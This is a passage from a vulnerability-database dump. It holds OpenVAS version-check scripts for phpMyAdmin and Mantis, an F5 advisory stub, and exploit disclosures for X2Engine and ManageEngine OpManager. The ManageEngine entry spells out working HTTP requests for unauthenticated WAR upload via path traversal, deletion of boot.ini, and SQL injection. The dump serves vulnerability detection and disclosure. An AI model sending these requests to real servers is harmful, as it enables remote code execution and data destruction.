0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.0\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.0.10.3\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.0.10.3\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( vers =~ \"^4\\.1\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.1.14.4\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.1.14.4\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.8.1\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.2.8.1\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-01T23:42:09", "references": ["https://www.phpmyadmin.net/security/PMASA-2014-4/"], "pluginID": "1361412562310108231", "description": "phpMyAdmin is prone to a cross-site scripting vulnerability.", "edition": 4, "reporter": "Copyright (c) 2017 Greenbone Networks GmbH", "published": "2017-08-18T00:00:00", "title": "phpMyAdmin 'CVE-2014-4954' Cross-Site Scripting Vulnerability (Linux)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4954"], "modified": "2017-10-24T00:00:00", "id": "OPENVAS:1361412562310108231", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108231", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_cve-2014-4954_lin.nasl 7543 2017-10-24 11:02:02Z cfischer $\n#\n# phpMyAdmin 'CVE-2014-4954' Cross-Site Scripting Vulnerability (Linux)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108231\");\n script_version(\"$Revision: 7543 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 13:02:02 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-18 12:18:02 +0200 (Fri, 18 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2014-4954\");\n script_name(\"phpMyAdmin 'CVE-2014-4954' Cross-Site Scripting Vulnerability (Linux)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-4/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to a cross-site scripting vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks the version.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin 4.2.x before 4.2.6.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.6 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.6\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.2.6\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-01T23:40:56", "references": ["https://www.phpmyadmin.net/security/PMASA-2014-4/"], "pluginID": "1361412562310108230", "description": "phpMyAdmin is prone to a cross-site scripting vulnerability.", "edition": 4, "reporter": "Copyright (c) 2017 Greenbone Networks GmbH", "published": "2017-08-18T00:00:00", "title": "phpMyAdmin 'CVE-2014-4954' Cross-Site Scripting Vulnerability (Windows)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4954"], "modified": "2017-10-24T00:00:00", "id": "OPENVAS:1361412562310108230", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108230", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_cve-2014-4954_win.nasl 7543 2017-10-24 11:02:02Z cfischer $\n#\n# phpMyAdmin 'CVE-2014-4954' Cross-Site Scripting Vulnerability (Windows)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108230\");\n script_version(\"$Revision: 7543 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 13:02:02 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-18 12:18:02 +0200 (Fri, 18 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2014-4954\");\n script_name(\"phpMyAdmin 'CVE-2014-4954' Cross-Site Scripting Vulnerability (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-4/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to a cross-site scripting vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks the version.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin 4.2.x before 4.2.6.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.6 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.6\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.2.6\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-01T23:54:49", "references": ["http://www.debian.org/security/2014/dsa-3030.html"], "pluginID": "1361412562310703030", "description": "Multiple SQL injection vulnerabilities have been discovered in the Mantis\nbug tracking system.", "edition": 3, "reporter": "Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net", "published": "2014-09-20T00:00:00", "title": "Debian Security Advisory DSA 3030-1 (mantis - security update)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310703030", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703030", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3030.nasl 9354 2018-04-06 07:15:32Z cfischer $\n# Auto-generated from advisory DSA 3030-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703030\");\n script_version(\"$Revision: 9354 $\");\n script_cve_id(\"CVE-2014-1608\", \"CVE-2014-1609\");\n script_name(\"Debian Security Advisory DSA 3030-1 (mantis - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2018-04-06 09:15:32 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name: \"creation_date\", value:\"2014-09-20 00:00:00 +0200 (Sat, 20 Sep 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3030.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"mantis on Debian Linux\");\n script_tag(name: \"insight\", value: \"Mantis is an issue tracker that is implemented in PHP.\nThe main features include:\n\n* Web Based\n* Supports any platform that runs PHP\n* Available in 68 localizations\n* Customizable Issue Pages\n* Multiple Projects per instance\n* Support for Projects, Sub-Projects, and Categories.\n* Users can have a different access level per project\n* Changelog Support\n* Roadmap\n* User View Page\n* Search and Filter\n* Built-in Reporting (reports / graphs)\n* Time Tracking\n* Custom Fields\n* Email notifications\n* Users can monitor specific issues\n* Attachments\n* Issue Change History\n* RSS Feeds\n* Customizable issue workflow\n* Sponsorships Support\n* Export to csv, Microsoft Excel, Microsoft Word\n* No limit on the number of users, issues, or projects.\n* Public / Private Projects\n* Public / Private Notes\n* Public / Private Issues\n* Public / Private News\n* Issue Relationships\n* Authentication\n+ Default Mantis Authentication (recommended)\n+ LDAP Integration\n+ HTTP Basic Authentication Support\n+ Active Directory Integration (patches available)\n* Multi-DBMS Support (using ADODB)\n+ MySQL\n+ MS SQL\n+ PostgreSQL\n+ Oracle (experimental)\n* Webservice (SOAP) interface\n* and more\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy), these problems have been fixed in\nversion 1.2.11-1.2+deb7u1.\n\nWe recommend that you upgrade your mantis packages.\");\n script_tag(name: \"summary\", value: \"Multiple SQL injection vulnerabilities have been discovered in the Mantis\nbug tracking system.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mantis\", ver:\"1.2.11-1.2+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mantis\", ver:\"1.2.11-1.2+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mantis\", ver:\"1.2.11-1.2+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mantis\", ver:\"1.2.11-1.2+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-28T10:48:26", "references": ["http://www.debian.org/security/2014/dsa-3030.html"], "pluginID": "703030", "description": "Multiple SQL injection vulnerabilities have been discovered in the Mantis\nbug tracking system.", "edition": 3, "reporter": "Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net", "published": "2014-09-20T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Debian Security Advisory DSA 3030-1 (mantis - security update)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2017-07-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703030", "id": "OPENVAS:703030", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3030.nasl 6715 2017-07-13 09:57:40Z teissa $\n# Auto-generated from advisory DSA 3030-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703030);\n script_version(\"$Revision: 6715 $\");\n script_cve_id(\"CVE-2014-1608\", \"CVE-2014-1609\");\n script_name(\"Debian Security Advisory DSA 3030-1 (mantis - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-13 11:57:40 +0200 (Thu, 13 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-09-20 00:00:00 +0200 (Sat, 20 Sep 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3030.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"mantis on Debian Linux\");\n script_tag(name: \"insight\", value: \"Mantis is an issue tracker that is implemented in PHP.\nThe main features include:\n\n* Web Based\n* Supports any platform that runs PHP\n* Available in 68 localizations\n* Customizable Issue Pages\n* Multiple Projects per instance\n* Support for Projects, Sub-Projects, and Categories.\n* Users can have a different access level per project\n* Changelog Support\n* Roadmap\n* User View Page\n* Search and Filter\n* Built-in Reporting (reports / graphs)\n* Time Tracking\n* Custom Fields\n* Email notifications\n* Users can monitor specific issues\n* Attachments\n* Issue Change History\n* RSS Feeds\n* Customizable issue workflow\n* Sponsorships Support\n* Export to csv, Microsoft Excel, Microsoft Word\n* No limit on the number of users, issues, or projects.\n* Public / Private Projects\n* Public / Private Notes\n* Public / Private Issues\n* Public / Private News\n* Issue Relationships\n* Authentication\n+ Default Mantis Authentication (recommended)\n+ LDAP Integration\n+ HTTP Basic Authentication Support\n+ Active Directory Integration (patches available)\n* Multi-DBMS Support (using ADODB)\n+ MySQL\n+ MS SQL\n+ PostgreSQL\n+ Oracle (experimental)\n* Webservice (SOAP) interface\n* and more\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy), these problems have been fixed in\nversion 1.2.11-1.2+deb7u1.\n\nWe recommend that you upgrade your mantis packages.\");\n script_tag(name: \"summary\", value: \"Multiple SQL injection vulnerabilities have been discovered in the Mantis\nbug tracking system.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mantis\", ver:\"1.2.11-1.2+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mantis\", ver:\"1.2.11-1.2+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mantis\", ver:\"1.2.11-1.2+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mantis\", ver:\"1.2.11-1.2+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "f5": [{"lastseen": "2016-09-26T17:22:56", "references": ["https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/4000/600/sol4602.html", "https://support.f5.com/kb/en-us/solutions/public/0000/100/sol167.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "**Note**: As of February 17, 2015, AskF5 Security Advisory articles include the Severity value. Security Advisory articles published before this date do not list a Severity value.\n\nRecommended Action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "reporter": "f5", "published": "2015-08-20T00:00:00", "title": "SOL17156 - PHP vulnerability CVE-2014-5298", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-5298"], "modified": "2015-08-20T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/17000/100/sol17156.html", "id": "SOL17156", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-03-14T14:37:35", "references": [], "description": "Exploit for multiple platform in category web applications", "edition": 1, "reporter": "Pedro Ribeiro", "published": "2018-01-26T00:00:00", "title": "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities", "type": "zdt", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-7866", "CVE-2014-7868", "CVE-2014-6036"], "modified": "2018-01-26T00:00:00", "href": "https://0day.today/exploit/description/29642", "id": "1337DAY-ID-29642", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014\r\n \r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n \r\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\r\n \r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n \r\n \r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\n<... WAR file payload ...>\r\nAffected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n \r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\n<... WAR file payload ...>\r\n \r\nAffected versions: OpManager v? to v11.4\r\n \r\n \r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4\r\n \r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n \r\n \r\n#3\r\nVulnerability: Remote code execution via file upload\r\nCVE-2014-7866\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n \r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n \r\nb)\r\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n \r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n \r\n \r\n#4\r\nVulnerability: Blind SQL injection\r\nCVE-2014-7868\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n \r\nb)\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n \r\n \r\n>> Fix:\r\nUpgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C].\r\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4).\r\nThe fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\r\n \r\n[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nResolves #1 and #2\r\n \r\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\r\nResolves #3\r\n \r\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\r\nResolves #4\r\n \r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/29642"}, {"lastseen": "2018-01-09T13:20:31", "references": [], "edition": 2, "description": "X2Engine versions 2.8 through 4.1.7 suffer from a PHP object injection and below suffer from an unrestricted file upload vulnerability due to poor use of a blacklist.", "reporter": "EgiX", "published": "2014-09-23T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "X2Engine 4.1.7 PHP Object Injection / Unrestricted File Upload Vulnerabilies", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5297", "CVE-2014-5298"], "modified": "2014-09-23T00:00:00", "id": "1337DAY-ID-22679", "href": "https://0day.today/exploit/description/22679", "sourceData": "-------------------------------------------------------------------------\r\nX2Engine <= 4.1.7 (SiteController.php) PHP Object Injection Vulnerability\r\n-------------------------------------------------------------------------\r\n\r\n\r\n[-] Software Link:\r\n\r\nhttp://www.x2engine.com/\r\n\r\n\r\n[-] Affected Versions:\r\n\r\nAll versions from 2.8 to 4.1.7.\r\n\r\n\r\n[-] Vulnerability Description:\r\n\r\nThe vulnerable code is located in the \"actionSendErrorReport\" method defined in /protected/controllers/SiteController.php:\r\n\r\n153. public function actionSendErrorReport(){\r\n154. if(isset($_POST['report'])){\r\n155. $errorReport = $_POST['report'];\r\n156. $errorReport = unserialize(base64_decode($errorReport));\r\n157. if(isset($_POST['email'])){\r\n158. $errorReport['email'] = $_POST['email'];\r\n159. }\r\n\r\nUser input passed through the \"report\" POST parameter is not properly sanitized before being used in a call to the \"unserialize()\"\r\nfunction at line 156. This can be exploited to inject arbitrary PHP objects into the application scope, and could allow an\r\nattacker to carry out Server-Side Request Forgery (SSRF) and possibly other attacks via specially crafted serialized objects.\r\n\r\n\r\n[-] Solution:\r\n\r\nApply the vendor patch or update to version 4.2 or later.\r\n\r\n\r\n[-] Disclosure Timeline:\r\n\r\n[31/07/2014] - Vendor notified\r\n[31/07/2014] - Vendor released security patch: http://x2community.com/?showtopic=1804\r\n[01/08/2014] - CVE number requested\r\n[16/08/2014] - CVE number assigned\r\n[05/09/2014] - Version 4.2 released\r\n[23/09/2014] - Public disclosure\r\n\r\n\r\n[-] CVE Reference:\r\n\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org)\r\nhas assigned the name CVE-2014-5297 to this vulnerability.\r\n\r\n\r\n\r\n--------------------------------------------------------------------------------\r\nX2Engine <= 4.1.7 (FileUploadsFilter.php) Unrestricted File Upload Vulnerability\r\n--------------------------------------------------------------------------------\r\n\r\n\r\n[-] Software Link:\r\n\r\nhttp://www.x2engine.com/\r\n\r\n\r\n[-] Affected Versions:\r\n\r\nVersion 4.1.7 and probably prior versions.\r\n\r\n\r\n[-] Vulnerability Description:\r\n\r\nThe vulnerability exists because of the FileUploadsFilter::EXT_BLACKLIST constant, which is a regular\r\nexpression for blacklisted files. Due to a lack of case-insensitive matching, the global upload filter\r\ncould be bypassed by uploading a malicious file with capital letters within the extension. This can be\r\nexploited to upload and execute arbitrary PHP scripts if X2Engine is running on a case-insensitive\r\nfilesystem or if the web server is configured to handle files\u2019 extensions in a case-insensitive fashion.\r\n\r\n\r\n[-] Solution:\r\n\r\nUpdate to version 4.2 or later.\r\n\r\n\r\n[-] Disclosure Timeline:\r\n\r\n[01/08/2014] - Vendor notified\r\n[02/08/2014] - CVE number requested\r\n[16/08/2014] - CVE number assigned\r\n[05/09/2014] - Version 4.2 released\r\n[23/09/2014] - Public disclosure\r\n\r\n\r\n[-] CVE 